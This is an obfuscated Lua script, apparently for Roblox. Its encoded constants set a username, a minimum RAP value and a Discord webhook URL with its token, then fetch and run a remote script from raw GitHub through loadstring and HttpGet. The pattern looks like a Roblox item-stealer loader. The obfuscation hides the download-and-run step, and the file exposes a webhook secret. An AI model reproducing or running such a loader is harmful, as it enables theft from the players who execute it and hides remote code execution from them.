--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v70,v19);v19=nil;v81=1;end end else return v70;end end end);local function v20(v31,v32,v33) if v33 then local v71=(v31/(((882 -(282 + 595)) -3)^(v32-1)))%((5 -(1640 -(1523 + 114)))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;else local v72=0;local v73;while true do if (v72==(568 -(367 + 201))) then v73=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + (957 -(892 + 65)) ;v35=(2 -1) + 0 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((0 -0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v38=181 -(67 + 113) ;end if (v38==(1 + 0)) then return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * 256) + v39 ;end end end local function v24() local v43=v23();local v44=v23();local v45=953 -(802 + 150) ;local v46=(v20(v44,2 -1 ,36 -16 ) * ((1 + 1 + 0)^(1029 -(915 + 82)))) + v43 ;local v47=v20(v44,59 -38 ,19 + 12 );local v48=((v20(v44,41 -9 )==(1188 -(1069 + (548 -(44 + 386))))) and  -(2 -1)) or (1 -0) ;if (v47==(0 + 0)) then if (v46==0) then return v48 * (0 -0) ;else local v83=0;while true do if (v83==0) then v47=1 + 0 ;v45=791 -((1854 -(998 + 488)) + 423) ;break;end end end elseif (v47==(6433 -(7760 -3374))) then return ((v46==0) and (v48 * (((457 -(145 + 293)) -(4 + 6 + 8))/0))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -2911) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v49) local v50;if  not v49 then local v74=(0 -0) + 0 ;while true do if (0==v74) then v49=v23();if (v49==((454 + 318) -((733 -532) + 571))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1139 -(116 + 1022)) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=1093 -(707 + 386) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=3) then else v59=nil;while true do local v84=0;while true do if (v84==1) then if ((0 -0)==v53) then local v107=0;local v108;while true do if (v107==(29 -(22 + 7))) then v108=0 + 0 ;while true do if (v108==(1 + 0)) then local v141=1985 -(1266 + 719) ;while true do if (v141~=(604 -(268 + 335))) then else v108=292 -(60 + 230) ;break;end if (v141==(572 -(426 + 146))) then v56={};v57={v54,v55,nil,v56};v141=1;end end end if (v108~=2) then else v53=1;break;end if (v108==0) then local v142=1456 -(282 + 1174) ;while true do if (v142==(812 -(569 + 242))) then v108=1;break;end if (v142==0) then v54={};v55={};v142=1;end end end end break;end end end break;end if (v84==0) then local v102=0 -0 ;while true do if (v102~=(1 + 0)) then else v84=1025 -(706 + 318) ;break;end if (0~=v102) then else if (v53~=(1253 -(721 + 530))) then else local v109=0;local v110;while true do if ((1271 -(945 + 326))==v109) then v110=0 -0 ;while true do local v153=0;while true do if (v153==(0 + 0)) then if (v110==1) then return v57;end if (0==v110) then local v175=0;while true do if (v175==1) then v110=701 -(271 + 429) ;break;end if (v175==(0 + 0)) then for v176=1501 -(1408 + 92) ,v23() do local v177=1086 -(461 + 625) ;local v178;local v179;while true do if ((1288 -(993 + 295))~=v177) then else local v183=0;while true do if (v183==(1 + 0)) then v177=1;break;end if (v183==0) then v178=0;v179=nil;v183=1;end end end if (v177~=(1172 -(418 + 753))) then else while true do if (v178~=(0 + 0)) then else v179=v21();if (v20(v179,1,1 + 0 )==(0 + 0)) then local v186=0 + 0 ;local v187;local v188;local v189;local v190;local v191;local v192;while true do if (1==v186) then v189=nil;v190=nil;v186=531 -(406 + 123) ;end if (v186==(1771 -(1749 + 20))) then v191=nil;v192=nil;v186=1 + 2 ;end if (v186~=(1325 -(1249 + 73))) then else while true do if (v187~=2) then else v192=nil;while true do if (v188~=1) then else local v193=0 + 0 ;local v194;while true do if (v193==0) then v194=0;while true do if ((1145 -(466 + 679))~=v194) then else local v204=0;while true do if (v204~=(2 -1)) then else v194=2 -1 ;break;end if (v204==0) then v191=nil;v192=nil;v204=1;end end end if (v194==(1901 -(106 + 1794))) then v188=1 + 1 ;break;end end break;end end end if (v188~=(0 + 0)) then else local v195=0;while true do if (v195==1) then v188=1;break;end if (v195==(0 -0)) then v189=0 -0 ;v190=nil;v195=115 -(4 + 110) ;end end end if (v188==(586 -(57 + 527))) then while true do if (v189==(1428 -(41 + 1386))) then local v196=103 -(17 + 86) ;while true do if (v196~=(0 + 0)) then else local v205=0 -0 ;while true do if (0~=v205) then else v192={v22(),v22(),nil,nil};if (v190==0) then local v208=166 -(122 + 44) ;local v209;local v210;while true do if (v208==(0 -0)) then v209=0 -0 ;v210=nil;v208=1;end if (v208~=(1 + 0)) then else while true do if (0==v209) then v210=0 + 0 ;while true do if ((0 -0)==v210) then v192[68 -(30 + 35) ]=v22();v192[4]=v22();break;end end break;end end break;end end elseif (v190==(1 + 0)) then v192[3]=v23();elseif (v190==2) then v192[3]=v23() -(2^16) ;elseif (v190~=3) then else local v214=0;local v215;while true do if (v214~=0) then else v215=0;while true do if (v215==0) then v192[1260 -(1043 + 214) ]=v23() -((7 -5)^(1228 -(323 + 889))) ;v192[10 -6 ]=v22();break;end end break;end end end v205=1;end if (1~=v205) then else v196=581 -(361 + 219) ;break;end end end if (v196==(321 -(53 + 267))) then v189=1 + 1 ;break;end end end if (0==v189) then local v197=0;local v198;while true do if ((413 -(15 + 398))==v197) then v198=0;while true do if (v198==(982 -(18 + 964))) then local v206=0 -0 ;while true do if (1==v206) then v198=1;break;end if (v206==(0 + 0)) then v190=v20(v179,2,3);v191=v20(v179,4,6);v206=1 + 0 ;end end end if (v198~=1) then else v189=1;break;end end break;end end end if (v189==2) then local v199=0;local v200;while true do if (v199==0) then v200=850 -(20 + 830) ;while true do if ((0 + 0)~=v200) then else local v207=0;while true do if (0~=v207) then else local v211=126 -(116 + 10) ;while true do if ((1 + 0)==v211) then v207=1;break;end if (v211==(738 -(542 + 196))) then if (v20(v191,1 -0 ,1)==(1 + 0)) then v192[2 + 0 ]=v59[v192[1 + 1 ]];end if (v20(v191,2,2)==(2 -1)) then v192[7 -4 ]=v59[v192[3]];end v211=1552 -(1126 + 425) ;end end end if (v207~=1) then else v200=1;break;end end end if (v200~=1) then else v189=3;break;end end break;end end end if (v189==(408 -(118 + 287))) then if (v20(v191,11 -8 ,3)==1) then v192[1125 -(118 + 1003) ]=v59[v192[4]];end v54[v176]=v192;break;end end break;end end break;end if (v187==(0 -0)) then v188=0;v189=nil;v187=378 -(142 + 235) ;end if (v187==1) then v190=nil;v191=nil;v187=2;end end break;end if ((0 -0)~=v186) then else v187=0;v188=nil;v186=1 + 0 ;end end end break;end end break;end end end for v180=978 -(553 + 424) ,v23() do v55[v180-1 ]=v28();end v175=1 -0 ;end end end break;end end end break;end end end if (v53~=1) then else local v111=0 + 0 ;while true do if (v111==(1 + 0)) then local v143=0 + 0 ;while true do if (v143==0) then for v167=1 + 0 ,v58 do local v168=0;local v169;local v170;local v171;local v172;while true do if (v168==(1 + 0)) then v171=nil;v172=nil;v168=2;end if (0~=v168) then else v169=0 -0 ;v170=nil;v168=2 -1 ;end if (v168==(4 -2)) then while true do if ((1 + 0)==v169) then v172=nil;while true do if (v170~=(4 -3)) then else if (v171==(754 -(239 + 514))) then v172=v21()~=0 ;elseif (v171==(1 + 1)) then v172=v24();elseif (v171~=(1332 -(797 + 532))) then else v172=v25();end v59[v167]=v172;break;end if (v170~=(0 + 0)) then else local v185=0 + 0 ;while true do if (v185~=(0 -0)) then else v171=v21();v172=nil;v185=1;end if (1==v185) then v170=1203 -(373 + 829) ;break;end end end end break;end if (v169~=0) then else local v182=0;while true do if (v182==0) then v170=0;v171=nil;v182=1;end if (v182==(732 -(476 + 255))) then v169=1;break;end end end end break;end end end v57[1133 -(369 + 761) ]=v21();v143=1;end if (v143~=(1 + 0)) then else v111=2 -0 ;break;end end end if (v111==(3 -1)) then v53=240 -(64 + 174) ;break;end if (v111==(0 + 0)) then v58=v23();v59={};v111=1 -0 ;end end end v102=337 -(144 + 192) ;end end end end end break;end if (v52~=1) then else local v75=0;while true do if (v75~=(216 -(42 + 174))) then else v55=nil;v56=nil;v75=1;end if (v75==(1 + 0)) then v52=2 + 0 ;break;end end end if (2==v52) then local v76=0;while true do if ((0 + 0)==v76) then v57=nil;v58=nil;v76=1;end if (v76~=1) then else v52=1507 -(363 + 1141) ;break;end end end if (v52~=0) then else local v77=1580 -(1183 + 397) ;while true do if (v77==(0 -0)) then v53=0;v54=nil;v77=1 + 0 ;end if (v77~=1) then else v52=1 + 0 ;break;end end end end end local function v29(v60,v61,v62) local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...) local v85=v64;local v86=v65;local v87=v66;local v88=v27;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=9) then if (v98<=4) then if (v98<=1) then if (v98==0) then local v112=v97[2];local v113,v114=v88(v95[v112](v13(v95,v112 + 1 ,v97[3])));v90=(v114 + v112) -1 ;local v115=0;for v138=v112,v90 do v115=v115 + 1 ;v95[v138]=v113[v115];end else v95[v97[2]]=v62[v97[3]];end elseif (v98<=2) then local v118=0;local v119;while true do if (v118==0) then v119=v97[2];v95[v119]=v95[v119](v13(v95,v119 + 1 ,v90));break;end end elseif (v98==3) then if (v95[v97[2]]==v97[4]) then v89=v89 + 1 ;else v89=v97[3];end else v62[v97[3]]=v95[v97[2]];end elseif (v98<=6) then if (v98==5) then do return;end else local v120=v97[2];v95[v120]=v95[v120](v13(v95,v120 + 1 ,v90));end elseif (v98<=7) then v95[v97[2]]=v97[3];elseif (v98==8) then local v146=0;local v147;local v148;while true do if (v146==1) then v95[v147 + 1 ]=v148;v95[v147]=v148[v97[4]];break;end if (v146==0) then v147=v97[2];v148=v95[v97[3]];v146=1;end end else v89=v97[3];end elseif (v98<=14) then if (v98<=11) then if (v98>10) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==1) then v90=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==2) then for v158=v125,v90 do local v159=0;while true do if (v159==0) then v128=v128 + 1 ;v95[v158]=v126[v128];break;end end end break;end if (v124==0) then v125=v97[2];v126,v127=v88(v95[v125](v13(v95,v125 + 1 ,v97[3])));v124=1;end end else local v129=v97[2];local v130=v95[v97[3]];v95[v129 + 1 ]=v130;v95[v129]=v130[v97[4]];end elseif (v98<=12) then v62[v97[3]]=v95[v97[2]];elseif (v98==13) then if (v95[v97[2]]==v97[4]) then v89=v89 + 1 ;else v89=v97[3];end else v89=v97[3];end elseif (v98<=16) then if (v98>15) then v95[v97[2]]=v62[v97[3]];else do return;end end elseif (v98<=17) then v95[v97[2]]();elseif (v98==18) then v95[v97[2]]();else v95[v97[2]]=v97[3];end v89=v89 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O006D696E5F726170025O0088D340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403473O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F61686E61647367616D6572322F506572736F6E616C536372697074732F6D61696E2F4F776E03083O00557365726E616D6503063O005363652O6E3703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132353136322O393635323436352O393233322F496E57784E514F437455792D2O4136513354533956526B666168307248324A496379576E456652535146446C6D643666656C73575A4B574866727335766F74396E56546C00163O0012073O00013O00260D3O000D000100020004093O000D0001001207000100043O001204000100033O001210000100053O001210000200063O002008000200020007001207000400084O000B000200044O000600013O00022O00110001000100010004093O0015000100260D3O0001000100010004093O000100010012070001000A3O001204000100093O0012070001000C3O0012040001000B3O0012073O00023O0004093O000100012O000F3O00017O00",v9(),...);
